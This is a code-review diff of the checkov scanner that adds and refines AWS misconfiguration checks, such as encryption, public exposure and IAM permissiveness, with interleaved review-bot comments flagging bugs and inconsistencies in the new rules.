@@ -0,0 +1,31 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_23 + name: Ensure every security groups rule has a description + category: NETWORKING + framework: cdk +scope: + languages: + - typescript +definition: + patterns: + or: + - pattern: | + new $AWS.CfnSecurityGroup(, {, securityGroupEgress: [] ,}, ) + conditions: + - not_pattern: | + new $AWS.CfnSecurityGroup(, {, securityGroupEgress: [, {,description: 'True', }, ] ,}, ) + - pattern: | + new $AWS.CfnSecurityGroup(, {, securityGroupIngress: [] ,}, ) + conditions: + - not_pattern: | + new $AWS.CfnSecurityGroup(, {, securityGroupIngress: [, {,description: 'True', }, ] ,}, ) + - pattern: new $AWS.CfnSecurityGroupIngress() + conditions: + - not_pattern: | + new $AWS.CfnSecurityGroupIngress(, {, description: $ARG, } ,) + - pattern: new $AWS.CfnSecurityGroupEgress() + conditions: + - not_pattern: | + new $AWS.CfnSecurityGroupEgress(, {, description: $ARG, } ,) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/TransferServerIsPublic.yaml b/checkov/cdk/checks/typescript/TransferServerIsPublic.yaml new file mode 100644 index 00000000000..7109ac92105 --- /dev/null +++ b/checkov/cdk/checks/typescript/TransferServerIsPublic.yaml @@ -0,0 +1,17 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_164 + name: Ensure Transfer Server is not exposed publicly. + category: GENERAL_SECURITY + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnServer() + conditions: + - not_pattern: | + new $AWS.CfnServer(, {, endpointType: 'VPC', }, ) + - not_pattern: | + new $AWS.CfnServer(, {, endpointType: 'VPC_ENDPOINT', }, ) diff --git a/checkov/cdk/checks/typescript/VPCEndpointAcceptanceConfigured.yaml b/checkov/cdk/checks/typescript/VPCEndpointAcceptanceConfigured.yaml new file mode 100644 index 00000000000..32d5e762c5e --- /dev/null +++ b/checkov/cdk/checks/typescript/VPCEndpointAcceptanceConfigured.yaml 
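Review bot: The first two `not_pattern`s in the CKV_AWS_23 hunk require the literal `description: 'True'` inside `securityGroupEgress` / `securityGroupIngress`, so a rule with any real description still fails; the `CfnSecurityGroupIngress` / `CfnSecurityGroupEgress` branches below correctly use `description: $ARG`. Changing the two to `description: $ARG` aligns them. It is also unclear whether `securityGroupEgress: []` in the positive pattern matches any array or only an empty literal; if the latter, a populated rule list is never examined.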
@@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_123 + name: Ensure that VPC Endpoint Service is configured for Manual Acceptance + category: NETWORKING + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnVPCEndpointService() + conditions: + - not_pattern: | + new $AWS.CfnVPCEndpointService(, {, acceptanceRequired: true, } ,) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/WAFEnabled.yaml b/checkov/cdk/checks/typescript/WAFEnabled.yaml new file mode 100644 index 00000000000..c9147b36654 --- /dev/null +++ b/checkov/cdk/checks/typescript/WAFEnabled.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_68 + name: CloudFront Distribution should have WAF enabled + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnDistribution() + conditions: + - not_pattern: | + new $AWS.CfnDistribution(, {, distributionConfig: {, webAclId: $ARG, }, } , ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/WorkspaceRootVolumeEncrypted.yaml b/checkov/cdk/checks/typescript/WorkspaceRootVolumeEncrypted.yaml new file mode 100644 index 00000000000..f80a62ee4f8 --- /dev/null +++ b/checkov/cdk/checks/typescript/WorkspaceRootVolumeEncrypted.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_156 + name: Ensure that Workspace root volumes are encrypted + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnWorkspace() + conditions: + - not_pattern: | + new $AWS.CfnWorkspace(, {, rootVolumeEncryptionEnabled: true, } , ) \ No newline at end of file diff --git a/checkov/cdk/checks/typescript/WorkspaceUserVolumeEncrypted.yaml b/checkov/cdk/checks/typescript/WorkspaceUserVolumeEncrypted.yaml new file mode 100644 index 00000000000..99f87558123 --- /dev/null 
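Review bot: The CKV_AWS_68 hunk files a WAF-association check under `category: ENCRYPTION`; nothing in it concerns encryption, and the sibling exposure checks (e.g. CKV_AWS_87) use `NETWORKING`. `category: NETWORKING` (or `GENERAL_SECURITY`) would be the accurate label. Only `CfnDistribution` is matched; the L2 `Distribution` takes `webAclId` directly in its props, so a second branch `pattern: new $AWS.Distribution()` with `not_pattern: new $AWS.Distribution(, {, webAclId: $ARG, } , )` would cover the common construct.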
+++ b/checkov/cdk/checks/typescript/WorkspaceUserVolumeEncrypted.yaml @@ -0,0 +1,15 @@ +metadata: + version: 0.2 + approach: define failing + id: CKV_AWS_155 + name: Ensure that Workspace user volumes are encrypted + category: ENCRYPTION + framework: cdk +scope: + languages: + - typescript +definition: + pattern: new $AWS.CfnWorkspace() + conditions: + - not_pattern: | + new $AWS.CfnWorkspace(, {, userVolumeEncryptionEnabled: true, } , ) \ No newline at end of file diff --git a/checkov/cdk/report.py b/checkov/cdk/report.py index 5dcb4ec2bab..1437f6fcbdd 100644 --- a/checkov/cdk/report.py +++ b/checkov/cdk/report.py @@ -12,7 +12,7 @@ def __init__(self, check_type: str, metadata: Dict[str, Optional[Union[str, int, self.language: SastLanguages = language self.cdk_report: PrismaReport = cdk_report # In case we dont have sast report for this lang - self.empty_sast_report: PrismaReport = PrismaReport(rule_match={language: {}}, profiler={}, errors={}, run_metadata={}, imports={}, reachability_report={}) + self.empty_sast_report: PrismaReport = PrismaReport(rule_match={language: {}}, profiler={}, errors={}, run_metadata={}, imports={}, reachability_report={}, skipped_checks_by_file={}) def get_summary(self) -> Dict[str, Union[int, str]]: base_summary: Dict[str, Union[int, str]] = super().get_summary() diff --git a/checkov/cdk/runner.py b/checkov/cdk/runner.py index 360f70c1a69..32c03c28096 100644 --- a/checkov/cdk/runner.py +++ b/checkov/cdk/runner.py @@ -35,6 +35,7 @@ def run( for lang in CDKLanguages.set(): self.cdk_langs.append(lang) + reports = super().run( root_folder=root_folder, external_checks_dir=external_checks_dir, diff --git a/checkov/circleci_pipelines/image_referencer/manager.py b/checkov/circleci_pipelines/image_referencer/manager.py deleted file mode 100644 index 3b4dede972a..00000000000 --- a/checkov/circleci_pipelines/image_referencer/manager.py +++ /dev/null 
@@ -1,12 +0,0 @@ -from __future__ import annotations -from typing import Any - -from checkov.circleci_pipelines.image_referencer.provider import CircleCIProvider -from checkov.common.images.workflow.image_referencer_manager import WorkflowImageReferencerManager - - -class CircleCIImageReferencerManager(WorkflowImageReferencerManager): - - def __init__(self, workflow_config: dict[str, Any], file_path: str) -> None: - provider = CircleCIProvider(workflow_config=workflow_config, file_path=file_path) - super().__init__(workflow_config, file_path, provider) diff --git a/checkov/circleci_pipelines/image_referencer/provider.py b/checkov/circleci_pipelines/image_referencer/provider.py deleted file mode 100644 index 04e37861811..00000000000 --- a/checkov/circleci_pipelines/image_referencer/provider.py +++ /dev/null 
@@ -1,50 +0,0 @@ -from __future__ import annotations - -from typing import Any, cast -import jmespath -from checkov.common.images.image_referencer import Image -from checkov.common.images.workflow.image_referencer_provider import WorkflowImageReferencerProvider -from checkov.common.util.consts import START_LINE, END_LINE -from checkov.yaml_doc.runner import Runner - - -class CircleCIProvider(WorkflowImageReferencerProvider): - __slots__ = ("workflow_config", "file_path") - - def __init__(self, workflow_config: dict[str, Any], file_path: str) -> None: - super().__init__(workflow_config, file_path) - - def generate_resource_key(self, start_line: int, end_line: int, tag: str) -> str: - sub_name = Runner.resolve_sub_name(self.workflow_config, start_line, end_line, tag) - if not sub_name: # Failed to locate the resource in the config file - return '' - image_name = Runner.resolve_image_name(self.workflow_config[tag][sub_name], start_line, end_line) - new_key = f'{tag}({sub_name}).docker.image{image_name}' if sub_name else tag - return new_key - - def extract_images_from_workflow(self) -> list[Image]: - images: list[Image] = [] - - keywords = ( - ('jobs', "jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}"), - ('executors', "executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__}"), - ) - for tag, keyword in keywords: - results = cast("list[dict[str, Any]]", jmespath.search(keyword, self.workflow_config)) - if not results: - continue - for result in results: - image_name = result.get("image") - if image_name: - resource_id = self.generate_resource_key(result[START_LINE], result[END_LINE], tag) - if resource_id: - images.append( - Image( - file_path=self.file_path, - name=image_name, - start_line=result[START_LINE], - end_line=result[END_LINE], - related_resource_id=resource_id, - ) - ) - return images 
diff --git a/checkov/circleci_pipelines/runner.py b/checkov/circleci_pipelines/runner.py index 438f5e76acc..5fe6eafe297 100644 --- a/checkov/circleci_pipelines/runner.py +++ b/checkov/circleci_pipelines/runner.py @@ -4,22 +4,18 @@ import os from typing import TYPE_CHECKING, Any, Iterable -from checkov.circleci_pipelines.image_referencer.manager import CircleCIImageReferencerManager -from checkov.common.images.image_referencer import Image, ImageReferencerMixin -from checkov.common.output.report import CheckType, Report from checkov.circleci_pipelines.registry import registry -from checkov.common.util.type_forcers import force_dict +from checkov.common.output.report import CheckType, Report from checkov.runner_filter import RunnerFilter from checkov.yaml_doc.runner import Runner as YamlRunner if TYPE_CHECKING: from checkov.common.checks.base_check_registry import BaseCheckRegistry - from networkx import DiGraph WORKFLOW_DIRECTORY = "circleci" -class Runner(ImageReferencerMixin["dict[str, dict[str, Any] | list[dict[str, Any]]]"], YamlRunner): +class Runner(YamlRunner): check_type = CheckType.CIRCLECI_PIPELINES # noqa: CCE003 # a static attribute def require_external_checks(self) -> bool: 
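Review bot: With the image-referencer code gone, `import os` (kept as context at the top of this hunk) and the `Any` name in `from typing import TYPE_CHECKING, Any, Iterable` may no longer be referenced anywhere in the module — the only visible uses were in the removed `run` tail and `extract_images` below; if so they are now unused imports that the project's lint will flag. Worth checking the rest of the file and trimming to `from typing import TYPE_CHECKING, Iterable`. The class body continues outside the hunk.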
@@ -89,37 +85,4 @@ def run( runner_filter = runner_filter or RunnerFilter() report = super().run(root_folder=root_folder, external_checks_dir=external_checks_dir, files=files, runner_filter=runner_filter, collect_skip_comments=collect_skip_comments) - if runner_filter.run_image_referencer: - if files: - # 'root_folder' shouldn't be empty to remove the whole path later and only leave the shortened form - root_folder = os.path.split(os.path.commonprefix(files))[0] - - image_report = self.check_container_image_references( - root_path=root_folder, - runner_filter=runner_filter, - definitions=self.definitions - ) - - if image_report: - return [report, image_report] # type:ignore[list-item] # report can only be of type Report, not a list - return report - - def extract_images( - self, - graph_connector: DiGraph | None = None, - definitions: dict[str, dict[str, Any] | list[dict[str, Any]]] | None = None, - definitions_raw: dict[str, list[tuple[int, str]]] | None = None - ) -> list[Image]: - images: list[Image] = [] - if not definitions: - return images - - for file_path, config in definitions.items(): - _config = force_dict(config) or {} - if not config: - continue - manager = CircleCIImageReferencerManager(workflow_config=_config, file_path=file_path) - images.extend(manager.extract_images_from_workflow()) - - return images diff --git a/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml b/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml new file mode 100644 index 00000000000..b290a69deb8 --- /dev/null +++ b/checkov/cloudformation/checks/graph_checks/SageMakerIAMPolicyOverlyPermissiveToAllTraffic.yaml 
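Review bot: `run` now silently ignores `runner_filter.run_image_referencer` for CircleCI pipelines; a user who passes the flag gets no indication that image references are no longer scanned for this framework. A debug line before the final `return report`, e.g. `logging.debug("image referencing is not supported for %s", self.check_type)` guarded by the flag, would make the behaviour change discoverable without altering the result. The `run` signature and its return annotation are outside the hunk; since the list-returning path is removed, confirm the annotation no longer advertises `list[Report]`.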
@@ -0,0 +1,25 @@ +metadata: + id: "CKV2_AWS_68" + name: "Ensure SageMaker notebook instance IAM policy is not overly permissive" + category: "NETWORKING" + +definition: + and: + - cond_type: filter + value: + - AWS::SageMaker::NotebookInstance + operator: within + attribute: resource_type + - cond_type: connection + resource_types: + - AWS::SageMaker::NotebookInstance + connected_resource_types: + - AWS::IAM::Role + operator: exists + - cond_type: attribute + resource_types: + - AWS::IAM::Role + attribute: "AssumeRolePolicyDocument.Statement[?(@.Effect == Allow)].Action[*]" + operator: "jsonpath_not_equals" + value: "*" + diff --git a/checkov/cloudformation/checks/resource/BaseCloudsplainingIAMCheck.py b/checkov/cloudformation/checks/resource/BaseCloudsplainingIAMCheck.py index 69714fd7e48..1448d5af8cc 100644 --- a/checkov/cloudformation/checks/resource/BaseCloudsplainingIAMCheck.py +++ b/checkov/cloudformation/checks/resource/BaseCloudsplainingIAMCheck.py @@ -1,5 +1,6 @@ from __future__ import annotations +import fnmatch import json import logging from abc import abstractmethod @@ -66,6 +67,7 @@ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: if statement_key in converted_policy_doc: policy_statement = PolicyDocument(converted_policy_doc) self.policy_document_cache[self.entity_path][policy.get("PolicyName")] = policy_statement + self.cloudsplaining_enrich_evaluated_keys(policy_statement) violations = self.cloudsplaining_analysis(policy_statement) if violations: logging.debug(f"detailed cloudsplaining finding: {json.dumps(violations)}") 
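Review bot: The attribute condition evaluates `AssumeRolePolicyDocument` — the role's trust policy — while the check name and file name speak of an overly permissive IAM policy for the notebook instance; a role whose inline `Policies[*].PolicyDocument` grants `Action: "*"` is not examined by this definition at all, so it appears to pass exactly the case the check is meant to catch. If the permissions policies are the intended target, the attribute should point at `Policies[*].PolicyDocument.Statement[?(@.Effect == Allow)].Action[*]` (and a `jsonpath_not_equals` against a list of actions needs confirming as the right operator). `category: "NETWORKING"` also looks misfiled for an IAM permission check; `IAM` is the category used by the sibling Cognito check in this diff. The file ends with an extra blank line.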
@@ -79,3 +81,27 @@ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: @abstractmethod def cloudsplaining_analysis(self, policy: PolicyDocument) -> list[str]: raise NotImplementedError() + + def cloudsplaining_enrich_evaluated_keys(self, policy: PolicyDocument) -> None: + try: + violating_actions = self.cloudsplaining_analysis(policy) + if violating_actions: + # in case we have violating actions for this policy we start looking for it through the statements + for stmt_idx, statement in enumerate(policy.statements): + actions = statement.statement.get('Action') # get the actions for this statement + if actions: + if isinstance(actions, str): + for violating_action in violating_actions: + if fnmatch.fnmatch(violating_action, actions): # found the violating action in our list of actions + self.evaluated_keys = [f"Properties/PolicyDocument/Statement/[{stmt_idx}]/Action"] + break + if isinstance(actions, list): + for action_idx, action in enumerate(actions): # go through the actions of this statement and try to match one violation + for violating_action in violating_actions: + if fnmatch.fnmatch(violating_action, action): # found the violating action in our list of actions + self.evaluated_keys.append( + f"Properties/PolicyDocument/Statement/[{stmt_idx}]/Action/[{action_idx}]/" + ) + break + except Exception as e: + logging.warning(f'Failed enriching cloudsplaining evaluated keys due to: {e}') diff --git a/checkov/cloudformation/checks/resource/aws/BedrockAgentEncrypted.py b/checkov/cloudformation/checks/resource/aws/BedrockAgentEncrypted.py new file mode 100644 index 00000000000..52e0db39ea7 --- /dev/null +++ b/checkov/cloudformation/checks/resource/aws/BedrockAgentEncrypted.py 
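Review bot: The two branches of `cloudsplaining_enrich_evaluated_keys` record keys differently: the `str` branch replaces `self.evaluated_keys` wholesale, while the `list` branch appends, so a later single-action statement overwrites keys collected from earlier list statements, and the list branch accumulates across calls unless something resets the attribute. Use `self.evaluated_keys.append(f"Properties/PolicyDocument/Statement/[{stmt_idx}]/Action")` in the `str` branch and drop the trailing slash in the list-branch key so both formats address paths the same way. The helper also re-runs `self.cloudsplaining_analysis(policy)`, which `scan_resource_conf` (previous hunk) runs again immediately afterwards; taking the violations as a parameter would avoid analysing each policy twice. The broad `except Exception` keeps this best-effort, which is reasonable, but `logging.warning(..., exc_info=True)` would preserve the traceback for debugging.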
@@ -0,0 +1,21 @@
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+from checkov.common.models.enums import CheckCategories
+from checkov.common.models.consts import ANY_VALUE
+
+
+class BedrockAgentEncrypted(BaseResourceValueCheck):
+ def __init__(self):
+ name = "Ensure Bedrock Agent is encrypted with a CMK"
+ id = "CKV_AWS_373"
+ supported_resources = ['AWS::Bedrock::Agent']
+ categories = [CheckCategories.ENCRYPTION]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def get_inspected_key(self):
+ return 'Properties/CustomerEncryptionKeyArn'
+
+ def get_expected_value(self):
+ return ANY_VALUE
+
+
+check = BedrockAgentEncrypted()
diff --git a/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py b/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py
new file mode 100644
index 00000000000..ac11a53234c
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/CognitoUnauthenticatedIdentities.py
@@ -0,0 +1,28 @@
+from typing import Any
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck
+
+
+class CognitoUnauthenticatedIdentities(BaseResourceValueCheck):
+ def __init__(self) -> None:
+ name = "Ensure AWS Cognito identity pool does not allow unauthenticated guest access"
+ id = "CKV_AWS_366"
+ supported_resources = ('AWS::Cognito::IdentityPool',)
+ categories = (CheckCategories.IAM,)
+ super().__init__(
+ name=name,
+ id=id,
+ categories=categories,
+ supported_resources=supported_resources,
+ missing_block_result=CheckResult.FAILED,
+ )
+
+ def get_expected_value(self) -> Any:
+ return False
+
+ def get_inspected_key(self) -> str:
+ return 'Properties/AllowUnauthenticatedIdentities'
+
+
+check = CognitoUnauthenticatedIdentities()
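Review bot: `BedrockAgentEncrypted.__init__`, `get_inspected_key` and `get_expected_value` carry no type annotations, whereas `CognitoUnauthenticatedIdentities` on the same line annotates all three; `def __init__(self) -> None:`, `def get_inspected_key(self) -> str:` and `def get_expected_value(self) -> Any:` (with `Any` imported from `typing`, as the Cognito file does) would make the new checks uniform. The same omission applies to the SageMaker checks added later in this diff: SagemakerDataQualityJobDefinitionEncryption, SagemakerDataQualityJobDefinitionTrafficEncryption, SagemakerDataQualityJobDefinitionVolumeEncryption, SagemakerModelWithNetworkIsolation, SagemakerNotebookEncryptedWithCMK and SagemakerNotebookInstanceAllowsIMDSv2.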
diff --git a/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py b/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py index 9f8a459dd0c..3f64dde9a4d 100644 --- a/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py +++ b/checkov/cloudformation/checks/resource/aws/DeprecatedLambdaRuntime.py @@ -5,7 +5,7 @@ class DeprecatedLambdaRuntime(BaseResourceNegativeValueCheck): - def __init__(self): + def __init__(self) -> None: name = "Ensure Lambda Runtime is not deprecated" id = "CKV_AWS_363" supported_resources = ['AWS::Lambda::Function', 'AWS::Serverless::Function'] @@ -16,17 +16,14 @@ def get_inspected_key(self) -> str: return "Properties/Runtime" def get_forbidden_values(self) -> List[Any]: + # Source: https://docs.aws.amazon.com/lambda/latest/dg/lambda-runtimes.html return ["dotnetcore3.1", "nodejs12.x", "python3.6", "python2.7", "dotnet5.0", "dotnetcore2.1", "ruby2.5", "nodejs10.x", "nodejs8.10", "nodejs4.3", "nodejs6.10", "dotnetcore1.0", "dotnetcore2.0", - "nodejs4.3-edge", "nodejs", - # "python3.7", # Uncomment on Nov 27, 2023 - # "nodejs14.x", # Uncomment on Nov 27, 2023 - # "ruby2.7", # Uncomment on Dec 7, 2023 - # "provided", # Uncomment on Dec 31, 2023 - # "go1.x", # Uncomment on Dec 31, 2023 - # "java8", # Uncomment on Dec 31, 2023 - # "nodejs16.x", # Uncomment on Mar 11, 2024 + "nodejs4.3-edge", "nodejs", "java8", "python3.7", "go1.x", "provided", "ruby2.7", "nodejs14.x" + # "nodejs16.x", # Uncomment on Jun 12, 2024 + # "python3.8". # Uncomment on Oct 14, 2024 # "dotnet7", # Uncomment on May 14, 2024 + # "dotnet6", # Uncomment on Nov 12, 2024 ] diff --git a/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py b/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py index 83ce8062abe..fbe70e3625f 100644 --- a/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py +++ b/checkov/cloudformation/checks/resource/aws/DocDBAuditLogs.py 
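Review bot: The commented future entry `# "python3.8". # Uncomment on Oct 14, 2024` has a period where the list separator belongs, so uncommenting it as written will be a syntax error; it should read `# "python3.8",  # Uncomment on Oct 14, 2024`. `"nodejs14.x"` is now the last live element with no trailing comma, so whichever entry is uncommented first will also need a comma added to the line above it — adding the trailing comma now avoids that trap. The deprecation dates in the comments cannot be verified from the diff; the source link added above the list is the right place to check them.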
@@ -1,4 +1,4 @@ -from typing import Any +from typing import Any, List from checkov.cloudformation.checks.resource.base_resource_value_check import BaseResourceValueCheck from checkov.common.models.enums import CheckCategories @@ -15,8 +15,8 @@ def __init__(self) -> None: def get_inspected_key(self) -> str: return "Properties/Parameters/audit_logs" - def get_expected_value(self) -> Any: - return "enabled" + def get_expected_values(self) -> List[Any]: + return ["all", "ddl", "dml_read", "dml_write", "enabled"] check = DocDBAuditLogs() diff --git a/checkov/cloudformation/checks/resource/aws/ECRPolicy.py b/checkov/cloudformation/checks/resource/aws/ECRPolicy.py index 6fe40d5ab44..cd7a6a04a0f 100644 --- a/checkov/cloudformation/checks/resource/aws/ECRPolicy.py +++ b/checkov/cloudformation/checks/resource/aws/ECRPolicy.py @@ -48,11 +48,17 @@ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: if "Statement" in policy_text.keys() and isinstance(policy_text["Statement"], list): for statement_index, statement in enumerate(policy_text["Statement"]): if "Principal" in statement.keys(): - for principal_index, principal in enumerate(statement["Principal"]): + principal_block = statement["Principal"] + evaluated_key = f"Properties/RepositoryPolicyText/Statement/[{statement_index}]/Principal" + if isinstance(principal_block, dict) and 'AWS' in principal_block: + principal_block = principal_block['AWS'] + evaluated_key += "/AWS" + for principal_index, principal in enumerate(principal_block): if principal == "*" and not self.check_for_constrained_condition(statement): - self.evaluated_keys = [ - f"Properties/RepositoryPolicyText/Statement/[{statement_index}]/Principal/[{principal_index}]" - ] + if isinstance(principal_block, list): + self.evaluated_keys = [f"{evaluated_key}/[{principal_index}]/"] + else: + self.evaluated_keys = [f"{evaluated_key}"] return CheckResult.FAILED return CheckResult.PASSED 
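Review bot: In `ECRPolicy.scan_resource_conf` the two new assignments produce differently shaped keys: `f"{evaluated_key}/[{principal_index}]/"` ends with a slash while `f"{evaluated_key}"` does not (and the latter is a redundant f-string — `[evaluated_key]` is enough); drop the trailing slash so both forms use the same path style. When `Principal` or `Principal.AWS` is a plain string, `enumerate(principal_block)` iterates characters, which only works for `"*"` because it is a single character; an explicit `isinstance(principal_block, str)` case would make that intent visible instead of relying on it.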
diff --git a/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py b/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py index 39a5a1a0f31..6bddcecb7a1 100644 --- a/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py +++ b/checkov/cloudformation/checks/resource/aws/ElasticacheReplicationGroupEncryptionAtTransitAuthToken.py @@ -23,7 +23,8 @@ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: """ properties = conf. get("Properties") if properties and isinstance(properties, dict): - if "TransitEncryptionEnabled" in properties.keys() and "AuthToken" in properties.keys(): + if "TransitEncryptionEnabled" in properties.keys() and ("AuthToken" in properties.keys() or + "UserGroupIds" in properties.keys()): if conf["Properties"]["TransitEncryptionEnabled"]: return CheckResult.PASSED return CheckResult.FAILED diff --git a/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py b/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py index 84160b68dbe..ae1d956cc4c 100644 --- a/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py +++ b/checkov/cloudformation/checks/resource/aws/IAMPrivilegeEscalation.py @@ -9,8 +9,15 @@ def __init__(self): super().__init__(name=name, id=id) def cloudsplaining_analysis(self, policy): - escalation = policy.allows_privilege_escalation - return escalation + escalations = policy.allows_privilege_escalation + flattened_escalations: list[str] = [] + if escalations: + for escalation in escalations: + if isinstance(escalation, dict): + flattened_escalations.extend(escalation.get('actions')) + else: + flattened_escalations.append(escalation) + return flattened_escalations check = cloudsplainingPrivilegeEscalation() 
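Review bot: `flattened_escalations.extend(escalation.get('actions'))` in `cloudsplaining_analysis` raises `TypeError` when an escalation dict has no `actions` key, because `extend(None)` is not allowed; `flattened_escalations.extend(escalation.get('actions') or [])` handles both the missing and the null case. The ElastiCache hunk on the same line now accepts `UserGroupIds` as an alternative to `AuthToken` while the check name still says AuthToken; a one-line comment such as `# RBAC user groups are an accepted alternative to an AuthToken` would explain the widened condition to the next reader.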
diff --git a/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py b/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py index 78d38557da4..4d2ab01cab9 100644 --- a/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py +++ b/checkov/cloudformation/checks/resource/aws/LambdaServicePermission.py @@ -27,7 +27,6 @@ def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult: else: return CheckResult.FAILED except IndexError: - print("Not a service principal") # Not a service principal, so pass. return CheckResult.UNKNOWN return CheckResult.UNKNOWN diff --git a/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py b/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py new file mode 100644 index 00000000000..1fd59437077 --- /dev/null +++ b/checkov/cloudformation/checks/resource/aws/MSKClusterEncryption.py 
@@ -0,0 +1,34 @@
+from typing import Any, List
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.cloudformation.checks.resource.base_resource_check import BaseResourceCheck
+
+
+class MSKClusterEncryption(BaseResourceCheck):
+ def __init__(self) -> None:
+ name = "Ensure MSK Cluster encryption in rest and transit is enabled"
+ id = "CKV_AWS_81"
+ supported_resources = ['AWS::MSK::Cluster']
+ categories = [CheckCategories.ENCRYPTION]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def scan_resource_conf(self, conf) -> Any:
+ # Note: As long as the 'EncryptionInfo' block is specified, the cluster
+ # will be encrypted at rest even if 'DataVolumeKMSKeyId' is not specified
+ if 'Properties' in conf.keys():
+ if 'EncryptionInfo' in conf['Properties'].keys():
+ encryption = conf['Properties']['EncryptionInfo']
+ if 'EncryptionInTransit' in encryption:
+ transit = encryption['EncryptionInTransit']
+ if 'ClientBroker' in transit and transit['ClientBroker'] != 'TLS' or \
+ 'InCluster' in transit and transit['InCluster'] is False:
+ return CheckResult.FAILED
+ return CheckResult.PASSED
+ return CheckResult.FAILED
+
+ def get_evaluated_keys(self) -> List[str]:
+ return ['Properties/EncryptionInfo/EncryptionInTransit/ClientBroker',
+ 'Properties/EncryptionInfo/EncryptionInTransit/InCluster']
+
+
+check = MSKClusterEncryption()
diff --git a/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py b/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py
new file mode 100644
index 00000000000..088115dd12c
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/MSKClusterLogging.py
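Review bot: `scan_resource_conf(self, conf) -> Any` in `MSKClusterEncryption` hides the real contract; `def scan_resource_conf(self, conf: dict[str, Any]) -> CheckResult:` matches the base class and the other CloudFormation checks, and the same applies to `MSKClusterLogging` in the next hunk. The in-transit test `transit['InCluster'] is False` only matches a parsed boolean; if the CloudFormation parser can leave the string `"false"` in place (not verifiable from this diff), that case passes silently, so a comparison that also covers the string form is worth considering. `'Properties' in conf.keys()` and `'EncryptionInfo' in conf['Properties'].keys()` are simply `in conf` / `in conf['Properties']`.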
@@ -0,0 +1,27 @@
+from typing import Any
+
+from checkov.common.models.enums import CheckResult, CheckCategories
+from checkov.cloudformation.checks.resource.base_resource_check import BaseResourceCheck
+
+
+class MSKClusterLogging(BaseResourceCheck):
+ def __init__(self) -> None:
+ name = "Ensure MSK Cluster logging is enabled"
+ id = "CKV_AWS_80"
+ supported_resources = ['AWS::MSK::Cluster']
+ categories = [CheckCategories.LOGGING]
+ super().__init__(name=name, id=id, categories=categories, supported_resources=supported_resources)
+
+ def scan_resource_conf(self, conf) -> Any:
+ if 'Properties' in conf.keys():
+ if 'LoggingInfo' in conf['Properties'].keys():
+ if 'BrokerLogs' in conf['Properties']['LoggingInfo'].keys():
+ logging = conf['Properties']['LoggingInfo']['BrokerLogs']
+ types = ["CloudWatchLogs", "Firehose", "S3"]
+ for x in types:
+ if x in logging and 'Enabled' in logging[x] and logging[x]['Enabled'] is True:
+ return CheckResult.PASSED
+ return CheckResult.FAILED
+
+
+check = MSKClusterLogging()
diff --git a/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py b/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py
new file mode 100644
index 00000000000..3f59908b2de
--- /dev/null
+++ b/checkov/cloudformation/checks/resource/aws/MSKClusterNodesArePrivate.py
